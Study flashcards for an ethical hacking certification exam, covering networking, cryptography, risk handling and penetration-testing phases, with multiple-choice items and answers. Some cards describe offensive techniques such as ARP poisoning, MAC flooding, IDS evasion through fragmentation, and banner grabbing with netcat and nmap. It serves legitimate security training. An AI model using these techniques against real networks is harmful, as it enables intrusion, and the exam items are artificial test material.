The MBSA vulnerability tool is specifically designed to locate potential exploits in which operating systems? A)Microsoft Windows B)Mac OS X C)Cisco IOS D)UNIX/Linux

Reconnaissance; Scanning and Enumeration; Gaining Access (includes Escalation of Privileges); Maintaining Access; Covering Tracks

The Phases of ethical hacking

SYN/FIN Scanning Using IP Fragments

The TCP header is split into several packets so that the packet filters are not able to detect what the packets intend to do

Application Presentation Session

The TCP/IP model Application layer is what in the OSI model layer?

Data Link Physical

The TCP/IP model Network Access layer is what in the OSI model layer?

Transport

The TCP/IP model Transport layer is what in the OSI model layer?

private

The ___ community string is used for read-write.

SAM

The ___ database holds encrypted versions of all the local passwords for accounts on the machine.

performance and CPU optimizations

The ___ in the processors such as branch prediction, out of order execution, caching, and speculative execution lead to these vulnerabilities

preparation

The ___ phase defines the time period during which the actual contract is hammered out. The scope of the test, the types of attacks allowed, and the individuals assigned to perform the activity are all agreed upon.

conclusion or post-assessment

The ___ phase defines the time when final reports are prepared for the customer, detailing the findings of the tests (including the types of tests performed) and many times even providing recommendations to improve security.

Accountability

The ability to trace actions performed on a system to a specific user or system entity.

Hacktivism

The act or actions of a hacker to put forward a cause or a political agenda, to affect some societal change, or to shed light on something he feels to be a political injustice. These activities are usually illegal in nature.

Refresh time

The amount of time a secondary DNS server will wait before asking for updates. The default value is 3,600 seconds (1 hour).

Retry time

The amount of time a secondary server will wait to retry if the zone transfer fails. The default value is 600 seconds.

escalate privileges

The attacker can ______ to obtain complete control of the system. In the process, intermediate systems that are connected to it are also compromised

Continuing access Unnoticed and uncaught

The attacker's intentions include: ____ to the victim's system, remaining ____, and deleting evidence that might lead to his prosecution

Discretionary access control (DAC)

The basis of this kind of security is that an individual user, or program operating on the user's behalf, is allowed to specify explicitly the types of access other users (or programs executing on their behalf) may have to information under the user's control.

Least Significant Bit Insertion

The binary data of the message is broken and inserted into the LSB of each pixel in the image file in a deterministic sequence

Availability

The condition of a resource being ready for use and accessible by authorized users.

Transformation

The data is embedded in the cover image by changing the coefficients of a transform of an image

Active Directory (AD)

The directory service created by Microsoft for use on its networks. It provides a variety of network services using Lightweight Directory Access Protocol (LDAP), Kerberos-based authentication, and single sign-on for user access to network-based resources.

A)All of these

The following access list is applied to an interface on a Cisco router: access-list 1 permit 192.168.5.0 0.0.255.255 access-list 1 deny host 192.168.5.2 Which of the following IP addresses would be allowed through the interface? A)All of these B)192.168.5.2 C)None of the above D)192.168.7.20 E)192.168.10.60 F)192.168.5.5

Expire time

The maximum amount of time a secondary server will spend trying to complete a zone transfer. The default value is 86,400 seconds (1 day).

TTL (Time To Live)

The minimum for all records in the zone. If not updated by a zone transfer, the records will perish. The default value is 3,600 seconds (1 hour).

B)False positive

The new NIDS (Network Intrusion Detection System) recently prevented a user from accessing resources remotely to which he should have access. Which type of alert does this represent? A)True negative B)False positive C)True positive D)False negative

C) HTTP tunneling

The penetration team is separated from potential targets by a firewall; however, a penetration test team member discovers port 80 is open. Which of the following techniques is the best choice to attempt sending data and/or commands to a target system behind the firewall? A) MAC flooding B) Session splicing C) HTTP tunneling D) Firewalking

unique number

The second half of the MAC address is a _____ burned in at manufacturing to ensure no two cards on any given subnet will have the same address.

B)Classify and prioritize

The security professionals working for your company have designed the procedures for incident handling and response. Today you received a notification of a virus infection. You successfully analyze the virus infection that has affected only your company's file servers. What is the next step you should complete? A)Contain B)Classify and prioritize C)Notify D)Investigate

Reconnaissance

The steps taken to gather evidence and information on the targets you want to attack.

Netcat

Tool for banner grabbing:

Tenable's Nessus Retina CS Microsoft Baseline Security Analyzer (MBSA) GFI LanGuard Qualys FreeScan OpenVAS

Vulnerability scanners:

LanWhoIs, HotWhois, Batch IP Converter, ActiveWhois, CallerIP, WhoisThisDomain, Whois Lookup Multiple Addresses, SoftFuse Whois, WhoIs Analyzer Pro, Whois, Domain Dossier, Whois, BetterWhois, DNSstuff, Whois Online, Network Solutions Whois, Web Wiz, WebToolHub, Network-Tools.com, UltraTools

WHOIS Lookup Tools

Regional Internet Registries; personal information of domain owners

WHOIS databases are maintained by ____ and contain the _____.

Domain name details, Contact details of domain owner, Domain name servers, NetRange, When a domain has been created, Expiry records, Records last updated

WHOIS query returns:

WebSite-Watcher, VisualPing, Follow That Page, Versionista, WatchThatPage, OnWebChange

Web Updates Monitoring Tools

download a website to a local directory

Web mirroring tools allow you to ___, recursively building all directories, HTML, images, Flash, videos, and other files from the server on your computer

HTTrack (www.httrack.com), Black Widow (http://softbytelabs.com), WebRipper (www.calluna-software.com), Teleport Pro (www.tenmax.com), GNU Wget (www.gnu.org), Backstreet Browser (http://spadixbd.com)

Web site mirroring tools:

B. Layer 4

What OSI layer does SSL operate in? A. Layer 7 B. Layer 4 C. Layer 3 D. Layer 2

Frame

What PDU is at Layer 2 of OSI model

Packet

What PDU is at Layer 3 of OSI model

Segment

What PDU is at Layer 4 of OSI model

RFC 5952

What RFC addresses IPv6 truncation?

Web spiders

What are applications that crawl through a website, reporting information on what they find?

HTTrack Web Site Copier, SurfOffline, BlackWidow, PageNest, NCollector Studio, Backstreet Browser, Website Ripper Copier, Offline Explorer Enterprise, Teleport Pro, GNU Wget, Portable Offline Browser, Hooeey Webprint

What are some Mirroring tools available with the two most popular first?

Make activity on the Internet untraceable; Allow you to bypass Internet censors

What can anonymizers do?

D)Perform testing through a firewall

What can network vulnerability scanners NOT do? A)Find wired and wireless network vulnerabilities B)Scan for open ports and listening services C)Find operating system and security configuration weaknesses D)Perform testing through a firewall

Service oriented architecture (SOA) vulnerability

What class of vulnerability is an XML denial of service attack?

1) # nc -vv www.juggyboy.com 80 (press ENTER) 2) GET / HTTP/1.0 (press ENTER twice)

What command is used for Banner Grabbing using Netcat?

tshark

What command launches a CLI version of Wireshark?

traceroute tracert

What command line tool can help map a network, tracks a packet across the Internet, and provides the route path and transit times?

nslookup

What command line tool is used to query DNS servers for information?

set query=mx

What command would you use to tell nslookup to find records on e-mail servers?

Cain & Abel

What common tool can be used for launching an ARP poisoning attack?

1) Host is not alive 2) Host might not respond to ICMP

What could a nonresponse to ICMP indicate?

Logs

What could be used to monitor application errors and violations on a web server or application?

Hub

What device will neither limit the flow of traffic nor have an impact on the effectiveness of sniffing?

B) Time exceeded

What does ICMP type 11, code 0, indicate? A) Redirect B) Time exceeded C) Echo Request D) Echo return

Server's public key

What does a client use to encrypt the session key in an SSL connection?

Destination unreachable, because the router has no route to the network on which the destination resides

What does an ICMP Type 3/Code 6 error message indicate?

C)Displays current firewall settings at a high level

What does the command netsh firewall show config do? A)Enables Windows firewall B)Provides an option to add rules to the configuration C)Displays current firewall settings at a high level D)Displays all rules within Windows Firewall

Ports

What does the enumeration phase not discover?

D. It defines the location of the Snort rules.

What does this line from the Snort configuration file indicate? var RULE_PATH c:\etc\snort\rules A. The configuration variable is not in the proper syntax. B. It instructs the Snort engine to write rule violations in this location. C. It instructs the Snort engine to compare packets to the rule set named "rules." D. It defines the location of the Snort rules.

C) AES

What encryption standard does WPA2 use? A) RC4 B) RC5 C) AES D) SHA-1

A)NTFS

What file system is the alternate data streams (ADS) vulnerability designed to exploit? A)NTFS B)VMFS C)FAT D)UFS

C. SYN/ACK

What flag or flags are sent in the segment during the second step of the TCP three-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK/FIN

Risk mitigation

What happens when a control is implemented to reduce the impact of a risk?

Risk acceptance

What happens when no control is used to address a particular risk?

Asymmetric routing

What is it called when traffic between point A and point B takes one route to get there and another to return?

A vulnerability exposed in the OpenSSL cryptographic library allowing attackers to steal server private keys and user session cookies and passwords.

What is Heartbleed?

Buffer overflow

What is it called when a program, while writing data to memory, overruns the memory boundary and overwrites adjacent memory locations?

Tailgating

What is it called when an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system?

ACK

What is missing from a half-open scan?

Difficult to install

What is not a benefit of hardware keyloggers?

A vulnerability exposed in the Unix Bash shell allowing attackers to execute arbitrary commands.

What is Shellshock?

Reused code that still contains vulnerabilities

What is shrinkwrap code?

technology platforms, employee details, login pages, intranet portals

What is some of the information extracted during Footprinting through Search Engines?

Computer Emergency Response Teams (CERTs) are expert groups that handle computer security incidents.

What is the CERT?

0xffffffffffff

What is the Layer 2 Ethernet broadcast address?

C) FF:FF:FF:FF:FF:FF

What is the MAC address in broadcast frames? A) AA:AA:AA:AA:AA:AA B) 11:11:11:11:11:11 C) FF:FF:FF:FF:FF:FF D) 99:99:99:99:99:99

dig @server name type
server = name or IP of the DNS name server
name = name of the resource you're looking for
type = the type of record you want to pull

What is the basic syntax for using dig?

C)512-bit blocks with an output of 160 bits

What is the block and output size of SHA1? A)1088-bit blocks with an output of 256 bits B)1024-bit blocks with an output of 256 bits C)512-bit blocks with an output of 160 bits D)512-bit blocks with an output of 128 bits

D)191.43.167.255

What is the broadcast address for the subnet 191.43.164.0/22? A)191.43.255.255 B)191.43.164.255 C)191.43.165.255 D)191.43.167.255

protocol.field operator value

What is the generic syntax of a Wireshark filter?

To evade detection by the IDS

What is the goal of session fragmentation and session splicing attacks?

investigating web resources and competitive intelligence, mapping out network ranges, mining WHOIS and DNS, social engineering, e-mail tracking, Google hacking

What is the logical flow that footprinting follows?

End-user training

What is the most efficient protection control against a social engineering attack?

Operating system and version

What is the most valuable information you can gain from a banner grab?

Steganography

What is the term for hiding messages or information within other non-secret text or data?

Key escrow

What is the term for placing copies of private keys used to encrypt data in the safekeeping of a third party organization?

Residual risk

What is the term for risk that still exists after security controls have been applied?

Factorization

What is the term for the decomposition of a value into a product of other values that give the original value when multiplied together?

Redundancy or fault tolerance

What is the term for the implementation of backup systems to prevent loss of access to resources?

D)Factorization

What is the term for the process of determining two numbers that can be multiplied together to equal a given starting value? A)Trapdooring B)Derivation C)Hashing D)Factorization

Vulnerability linkage

What is the term for the process of identifying sets of vulnerabilities that can be used to penetrate a network?

War chalking

What is the term for writing wireless access information on the side of a building?

The opening of a TCP connection

What is the three-way handshake?

To fill the MAC table with nonexistent MAC addresses, causing the switch to flood all frames out all interfaces and allowing the attacker to receive frames they would normally not be allowed to see

What is the ultimate goal of a MAC flood attack?

Cookie

What is used to store session information?

C)Public key

What item is contained in the digital certificate that enables the receiver of the certificate to send an encrypted email to the sender? A)Private key B)Signature C)Public key D)Serial number

Business or functional manager

What job role is in charge of ensuring systems and information assets for a unit are used to accomplish business objectives?

Facilities manager

What job role is in charge of addressing physical risks to the facility?

Get recipient's system IP address; Geolocation of the recipient; When the email was received and read; Whether or not the recipient visited any links sent to them; Get recipient's browser and operating system information; Time spent reading the emails

What kind of information can be gathered through email tracking?

Network Access

What layer of the TCP/IP model has the following protocols: ARP, L2TP, STP, HDLC, FDDI, etc.?

Application

What layer of the TCP/IP model has the following protocols: HTTP, FTP, SNMP, SMTP, DNS, POP, IMAP, NNTP, Telnet, SSH, DHCP, etc.?

Internet

What layer of the TCP/IP model has the following protocols: IP, ICMP?

Transport

What layer of the TCP/IP model has the following protocols: TCP, UDP?

Encryption

What may be helpful in protecting the content on a web server from being viewed by unauthorized personnel?

C. By manipulating the Time-To-Live (TTL) parameter

What method does traceroute use to map routes traveled by a packet? A. By carrying a hello packet in the payload, forcing the host to respond B. By using DNS queries at each hop C. By manipulating the Time-To-Live (TTL) parameter D. By using ICMP Type 5, Code 0 packets

Promiscuous Mode

What mode must be configured to allow a NIC to capture all traffic on the wire?

netstat -an

What netstat command displays all connections and listening ports, with addresses and port numbers in numerical form?

National Institute of Standards and Technology (NIST)

What organization has as its official mission to promote U.S. innovation and industrial competitiveness?

C) /etc

Where is the password file kept on a Linux machine? A) /dev B) /config C) /etc D) /com

D. Calling the company's help desk line E. Employing passive sniffing

Which of the following activities are not considered passive footprinting? (Choose two.) A. Dumpster diving B. Reviewing financial sites for company information C. Clicking links within the company's public website D. Calling the company's help desk line E. Employing passive sniffing

B)Mitigate C)Accept E)Avoid

Which of the following are acceptable methods for handling risk? (Choose all that apply.) A)Ignore B)Mitigate C)Accept D)Reject E)Avoid

B. Enable DHCP snooping on the switch. D. Configure DHCP filters on the switch.

Which of the following are the best preventive measures to take against DHCP starvation attacks? (Choose two.) A. Block all UDP port 67 and 68 traffic. B. Enable DHCP snooping on the switch. C. Use port security on the switch. D. Configure DHCP filters on the switch.

A) They are used to identify networks C) They can be a maximum of 32 characters

Which of the following are true regarding SSIDs? A) They are used to identify networks B) They are used to encrypt traffic on networks C) They can be a maximum of 32 characters D) They can be a maximum of 16 characters

B) It is used in encryption of passwords on Windows NT machines D) It uses a 128 bit key

Which of the following are true regarding Syskey? (Choose all that apply) A) It is used in encryption of passwords on certain Linux systems B) It is used in encryption of passwords on Windows NT machines C) It uses a 256 bit key D) It uses a 128 bit key

A)Theft of a password by a coworker or remote contractor

Which of the following attacks can NOT be effectively mitigated by file permissions? A)Theft of a password by a coworker or remote contractor B)Posing as the server after a successful authentication to gain access to data C)Intercepting and modifying unsigned SMB packets to gain access to data D)Posing as the client machine after a successful authentication to gain access to data

A. XSS

Which of the following attacks lets you assume a user's identity at a dynamically generated web page? A. XSS B. SQL Injection C. Session Hijacking D. Zone transfer

B)ARP poisoning

Which of the following attacks occurs at the Data Link layer of the OSI model? A)IP address spoofing B)ARP poisoning C)Rogue DHCP server D)Cross-site scripting

A) Using a protocol in a way it was not originally intended to be used

Which of the following best defines "covert channel"? A) Using a protocol in a way it was not originally intended to be used B) An application using a port that is not well known C) A hacker using a browser to look at the company's public website D) A wireless connection

B. Security tokens

Which of the following best defines a logical or technical control? A. Air conditioning B. Security tokens C. Fire alarms D. Security policy

B. Injecting parameters into a connection string using semicolons as separators

Which of the following best describes a connection stream parameter pollution attack? A. Injecting the same name into multiple parameters within an HTTP request B. Injecting parameters into a connection string using semicolons as separators C. Adjusting session identifiers to explicit, known values D. Injecting JavaScript code into multiple input parameters

Directory traversal

Which of the following is used to access content outside the root of a website?

B. An external DNS server is Active Directory integrated.

Which of the following may be a security concern for an organization? A. The internal network uses private IP addresses registered to an Active Directory-integrated DNS server. B. An external DNS server is Active Directory integrated. C. All external name resolution requests are accomplished by an ISP. D. None of the above.

D) All of the above

Which of the following may be used in a fully switched subnet to improve sniffing efforts? A) MAC Flooding B) ARP Spoofing C) Span Ports D) All of the above

IP DHCP Snooping

Which of the following prevents ARP poisoning?

B)SOAP

Which of the following protocols or standards formats information in XML? A)CORBA B)SOAP C)DCOM D)OLE

A) Common Criteria

Which of the following refers to an international standard that provides a set of requirements for evaluation? A) Common Criteria B) ISO 9600 C) DEV 201 Series D) The Blue Book

A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies

Which of the following represents EC-Council's scanning methodology? A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies B) Check for open ports, check for live systems, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies C) Perform banner grabbing, check for live systems, check for open ports, scan for vulnerabilities, draw network diagrams, and prepare proxies D) Draw network diagrams, check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, and prepare proxies

D)Sensitive information was obtained from a stolen company laptop

Which of the following scenarios could be prevented by using EFS? A)DDoS attack makes the network inaccessible for four hours B)Thieves breaking into the server room and damaging the servers C)Sensitive data captured with a sniffer during transmission D)Sensitive information was obtained from a stolen company laptop

C)Conducting security assessments on network resources

Which of the following security actions is intended to validate existing systems? A)Recording the steps taken when upgrading network servers. B)Deploying a new configuration to a router C)Conducting security assessments on network resources D)Assigning responsibilities to the technical team

A)Auditing

Which of the following security tools should be examined before implementation to gauge its effects on performance? A)Auditing B)Vulnerability scanner C)Wireless sniffer D)Antivirus software

C) Defense in depth

Which of the following sets up many, varying security controls to protect an organization's IT resources? A) Single sign-on B) Overt channels C) Defense in depth D) Multilayer firewall

A)Network range of protected IP addresses B)Excluded rule files

Which of the following settings can be specified in the Snort configuration file? (Choose all that apply.) A)Network range of protected IP addresses B)Excluded rule files C)XOR encoders for NOPS D)FIN, URG and PUSH flags for TCP headers

C. Technical details and procedures

Which of the following should not be included in a security policy? A. Policy exceptions B. Details on noncompliance disciplinary actions C. Technical details and procedures D. Supporting document references

C) UDP 514

Which of the following standard ports must be opened on the firewall to allow log messages to be sent to a log analysis tool? A) UDP 123 B) TCP 123 C) UDP 514 D) TCP 514

C)Most serious threat the organization faces

Which of the following statements BEST describes disgruntled employees? A)Less of a threat than black hat hackers, but more of a threat than gray hat hackers B)Less of a threat than gray hat hackers, but more of a threat than white hat hackers C)Most serious threat the organization faces D)Pose no threat to the organization

A)They invented RSA encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption

Which of the following statements are FALSE with regard to Whitfield Diffie and Martin Hellman? (Choose all that apply.) A)They invented RSA encryption B)They invented public key encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption

A)It was replaced by the program ipchains C)It controls the packet filter or firewall capabilities

Which of the following statements are true of the program ipfwadm? (Choose all that apply.) A)It was replaced by the program ipchains B)It is a program written for Windows C)It controls the packet filter or firewall capabilities D)It has additional code that filters for fragmented packets

C)It is a form of mutual authentication.

Which of the following statements is NOT true about RSA SecurID? A)It uses a password only once. B)It is a form of two-factor authentication. C)It is a form of mutual authentication. D)Passwords stolen through phishing attacks will fail.

D. Port scanning is used to identify potential vulnerabilities on a target system.

Which of the following statements is true regarding port scanning? A. Port scanning's primary goal is to identify live targets on a network. B. Port scanning is designed to overload the ports on a target in order to identify which are open and which are closed. C. Port scanning is designed as a method to view all traffic to and from a system. D. Port scanning is used to identify potential vulnerabilities on a target system.

C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step.

Which of the following statements is true regarding the TCP three-way handshake? A. The recipient sets the initial sequence number in the second step. B. The sender sets the initial sequence number in the third step. C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step. D. When accepting the communications request, the recipient responds with an acknowledgment and a randomly generated sequence number in the third step.

D)Security policies are technology specific.

Which of the following statements regarding security policies is NOT true? A)Security policies reduce legal liability to third parties. B)Security policies protect companies from threats. C)Security policies protect confidential and proprietary information. D)Security policies are technology specific.

B)Take ownership of a file

Which of the following tasks cannot be performed using cacls.exe, but is supported by xacls.exe? A)Display permissions to a file B)Take ownership of a file C)Modify an ACL D)Assign permissions to a folder

D)John the Ripper

Which of the following technical assessment tools is used to test passwords for weakness? A)Tripwire B)Snort C)Nmap D)John the Ripper

A)Prone to man-in-the-middle attacks E)Maps 48-bit addresses to 32-bit addresses

Which statements are true of ARP? (Choose two.) A)Prone to man-in-the-middle attacks B)Maps 48-bit addresses to host names C)Resistant to man-in-the-middle attacks D)Maps 32-bit addresses to host names E)Maps 48-bit addresses to 32-bit addresses

The last step involves returning any systems to their state prior to the pen test, which can include removing or cleaning up user accounts created externally as a result of the test (Clearing Tracks).

Which step in a penetration test is sometimes called "cleaning up"?

Disgruntled employees

Which threat agent poses the biggest threat to the disclosure of sensitive data?

C)Disclosure of sensitive data

Which threat poses the highest impact to the organization by a disgruntled employee? A)Introduction of stress into the work environment B)Negative effect on morale C)Disclosure of sensitive data D)Low productivity

XCACLS.exe

Which tool can take ownership of a file from the Windows command line?

fragroute

Which tool is used to intercept, modify, and rewrite egress traffic destined for the specified host in such a way that a NIDS cannot recognize the attack signatures?

D)WirelessMon E)Vistumbler F)NetStumbler

Which tool(s) are used to discover a nearby Wi-Fi network or device? (Choose all that apply.) A)Skyhook B)AirPcap C)Wireshark D)WirelessMon E)Vistumbler F)NetStumbler

B)Botnet zombies

Which trait differentiates a DoS attack from a DDoS attack? A)Injected code B)Botnet zombies C)Spoofed IP address D)SYN flood

Point-to-Point Tunneling Protocol (PPTP)

Which tunneling protocol operates at the Data Link layer and uses Microsoft Point-to-Point Encryption (MPPE) to protect the connection?

A)Provide third party access to data B)Facilitate recovery operations

Which two of the following are goals of key escrow agreements? A)Provide third party access to data B)Facilitate recovery operations C)Enhance the security of public keys D)Enhance the security of private keys

B. TCP 53

You are told to monitor a packet capture for any attempted DNS zone transfer. Which port should you focus your search on? A. TCP 22 B. TCP 53 C. UDP 22 D. UDP 53

D)Deploy the smart cards to control building access and the biometrics to control data center access.

You must design physical security for a new building your company is building. You need to select the appropriate physical control for the building itself, for the network wiring closets, and for the data center located in the building. You have been given the funds to implement smart cards and biometrics. You need to keep the cost of these systems as low as possible. Where should you deploy these systems? A)Deploy the biometrics to control building access and the smart cards to control data center access. B)Deploy the biometrics to control building access and the smart cards to control wiring closet access. C)Deploy the smart cards to control building access and the biometrics to control wiring closet access. D)Deploy the smart cards to control building access and the biometrics to control data center access.

B)Bluebugging D)SMiShing F)Jailbreaking/rooting

You must determine the possible vulnerabilities that could be exploited on your company's mobile devices. Which of the following attacks are ONLY targeted at mobile platforms? (Choose all that apply.) A)Drive-by downloading B)Bluebugging C)Man-in-the-middle D)SMiShing E)Clickjacking F)Jailbreaking/rooting

A)Validate all inputs C)Protect data D)Implement appropriate access controls F)Implement error and exception handling G)Encode data

You must work with application designers to ensure that a new Web application adheres to OWASP's Top 10 Proactive Controls. Which of the following are part of this? (Choose all that apply.) A)Validate all inputs B)Implement detailed error messaging C)Protect data D)Implement appropriate access controls E)Disclose data F)Implement error and exception handling G)Encode data

A)x86/opty2

You need to create a NOP slide using the Metasploit Framework. Which module should you use? A)x86/opty2 B)0xf3af1000 C)x86/xor D)0xd503201f

A)PGP

You need to deploy an asymmetric encryption mechanism that will sign, encrypt, and decrypt emails to increase the security of e-mail communications. Which encryption mechanism should you implement? A)PGP B)IPSec C)3DES D)SHA1

D)Netstumbler

You need to detect 802.11b wireless networks in the area. Which product should you use? A)AirSnort B)Retina C)Network Mapper D)Netstumbler

C)Fragmenting the attack payload

You need to determine how attackers can evade an intrusion detection system (IDS). Which of the following best describes session splicing? A)Spoofing the attack source B)Encoding the attack payload C)Fragmenting the attack payload D)Disabling the attack target

B)Router ACL

You need to ensure that malicious packets are prevented from entering your private network. Packets should be evaluated based on the following criteria: -Source IP addresses -Protocol and port number Which type of security tool will use only these criteria to deny access? A)NTFS permissions B)Router ACL C)NIPS D)NIDS

B. Closed

You receive a RST-ACK from a port during a SYN scan. What is the state of the port? A. Open B. Closed C. Filtered D. Unknown

Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops

You run the following command: nmap -p21,80,443 -sV -O 45.33.32.156 What is the most likely partial output? A) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https B) Host is up (0.029s latency). Not shown: 992 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 135/tcp filtered msrpc 443/tcp filtered https C) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops D) Host is up (0.029s latency). PORT STATE SERVICE 21/tcp closed ftp 80/tcp open http 443/tcp filtered https

D. sc query state=all

You want to display active and inactive services on a Windows Server machine. Which of the following commands best performs this service? A. sc query B. sc query type=all C. sc query type=service D. sc query state=all

A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range.

Your company implements a demilitarized zone (DMZ) to isolate publicly available servers. The security engineer implements the following rule on the firewall that protects and isolates the DMZ: Permit 10.1.1.12 192.168.2.0/24 TCP/UDP Port 3389 What does this rule do? A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. B)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with the device with an address of 192.168.2.0. C)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. D)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with the device with an address of 192.168.2.0.

B)Identify if computer files have been changed

Your company regularly uses MD5 hashing on their file server. What is the purpose? A)Capture all communication with the file server B)Identify if computer files have been changed C)Detect any intrusions on the file server D)Prevent any intrusions on the file server

802.11n

can run upward of 150 Mbps

OpManager

is network monitoring software that offers advanced fault and performance management functionality across critical IT resources such as routers, WAN links, switches, firewalls, VoIP call paths, physical servers, etc.

Simple Service Discovery Protocol (SSDP)

is a network protocol that works in conjunction with UPnP to detect plug and play devices available in a network

Spam Mimic

is a spam/email steganography tool that encodes the secret message into innocent-looking spam emails

Shoulder Surfing

is a technique where attackers secretly observe the target to gain critical information

FOCA (Fingerprinting Organizations with Collected Archives)

is a tool used mainly to find metadata and hidden information in the documents it scans

Social engineering

is the art of exploiting human behaviour to extract confidential information

XMAS

is so named because all flags are turned on.

ethical hacker

is someone who employs the same tools and techniques a criminal might use, with the customer's full support and approval, to help secure a network or system.

phreaker

is someone who manipulates telecommunication systems in order to make free calls.

PsList

list detailed information about processes

basically just run a reverse DNS lookup on all IPs in the subnet.

list scan

cyberterrorist

motivated by religious or political beliefs to create fear and large-scale systems disruption

Web spiders

perform automated searches on the target website and collect specified information such as employee names, email addresses, etc.

Angry IP Scanner

pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc

Registered ports

port numbers 1024-49151

/etc/passwd

where can the UID (User ID) and GID (Group ID) be found on a Linux machine?

Scanning Methodology

Check for Live Systems, Check for Open Ports, Scanning Beyond IDS, Banner Grabbing, Scan for Vulnerability, Draw Network Diagrams, Prepare Proxies, Scanning Pen Testing

provide compatibility

In the Windows Application Compatibility Framework, a shim is used to ___ between older and newer versions of the Windows operating system

B)Receive incoming syslog messages

Recently, you decided to open UDP port 514 on your company's firewall. What is the purpose of this action? A)Receive network time protocol messages B)Receive incoming syslog messages C)Allow users to access computers using rlogin D)Receive SNMP packets

TCP/UDP 162

SNMP Trap

Telnet request to port 25

What would the below output represent? 220 mailserver.domain.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sat, 29 Jan 2011 11:29:14 +0200

D) Sigverif

Which built-in Windows tool can be used to check the integrity of digitally signed critical files from Microsoft? A) Sc B) Netstat C) Msconfig D) Sigverif

D. Single Quote

Which character is the best choice to start a SQL injection attempt? A. Colon B. Semicolon C. Double Quote D. Single Quote

C)Preventative

Which class of control is smart card authentication? A)Prescriptive B)Corrective C)Preventative D)Detective

SSL

Which common web transport protocol can be used to evade an IDS and tunnel malicious content?

D)Switches

Which device is susceptible to MAC flood attacks? A)Hubs B)Routers C)Firewalls D)Switches

B)GLBA

Which of the following addresses the collection and disclosure of customers' personal financial information by financial institutions? A)HIPAA B)GLBA C)SOX D)FISMA

C) PKI

Which of the following are NOT components of a Kerberos system? A) KDC B) AD C) PKI D) TGS E) TGT

Meltdown Vulnerability

-Attackers may take advantage of this vulnerability to escalate privileges by forcing an unprivileged process to read other adjacent memory locations such as kernel memory and physical memory -This leads to the disclosure of critical system information such as credentials, private keys, etc.

Spectre Vulnerability

-Attackers may take advantage of this vulnerability to read adjacent memory locations of a process and access information for which he/she is not authorized -Using this vulnerability an attacker can even read the kernel memory or perform a web based attack using JavaScript

LOCAL_SYSTEM

Which Windows security context is a hacker operating from if the hacker can spawn a shell after a successful buffer overflow attack?

A)Iris

Which biometric scan focuses on the colored portion of the user's eye? A)Iris B)Retina C)Facial recognition D)Corneal

promiscuous mode

A configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just frames addressed to it -- a feature normally used for packet sniffing and bridged networking for hardware virtualization. Windows machines use WinPcap for this; Linux uses libpcap.

ICMP Type 4

A congestion control message.

C) 128

A Windows Server 2000 machine uses Syskey as an additional security step in regard to password protection. How many bits does Syskey use for encryption? A) 40 B) 64 C) 128 D) 256

promiscuous

A ___ policy is basically wide open.

Paranoid

A ___ policy locks everything down, not even allowing the user to open so much as an Internet browser.

Prudent

A ___ policy provides maximum security but allows some potentially or known dangerous services because of business needs.

Authentication header (AH)

An Internet Protocol Security (IPSec) header to verify that the contents of a packet have not been modified while the packet was in transit.

brute-force password attack

A method of password cracking whereby all possible options are systematically enumerated until a match is found. These attacks try every password (or authentication option), one after another, until successful.

Intranet Zone

A controlled zone that has few or no heavy restrictions.

B)set type=mx

A hacker is using nslookup in interactive mode to query Domain Name Service (DNS). The hacker specifically wants to discover the mail server records for your network. What should the hacker type into the command shell to request the appropriate records? A)locate type=ns B)set type=mx C)locate type=mx D)set type=ns

D)Hacktivist

A hacker was recently caught trying to deface the web site of a company with which he had a serious disagreement concerning their use of certain chemicals in their products. What is this type of hacker called? A)Ethical hacker B)White hat C)Cracker D)Hacktivist

Biometrics

A measurable, physical characteristic used to recognize the identity, or verify the claimed identity, of an applicant.

Production Network Zone (PNZ)

A very restricted zone that strictly controls direct access from uncontrolled zones.

TCP

A SYN attack uses which protocol?

Challenge Handshake Authentication Protocol (CHAP)

An authentication method on point-to-point links, using a three-way handshake and a mutually agreed-upon key.

certificate

An electronic file used to verify a user's identity, providing nonrepudiation throughout the system. It is also a set of data that uniquely identifies an entity. It contains the entity's public key, serial number, version, subject, algorithm type, issuer, valid dates, and key usage details.

Burp Suite Firebug Website Informer

Analyzing a website from afar can show information such as software in use, OS, filenames, paths, and contact details. What tools can you use to gather this information?

B)getElementsByTagName() C)getElementById()

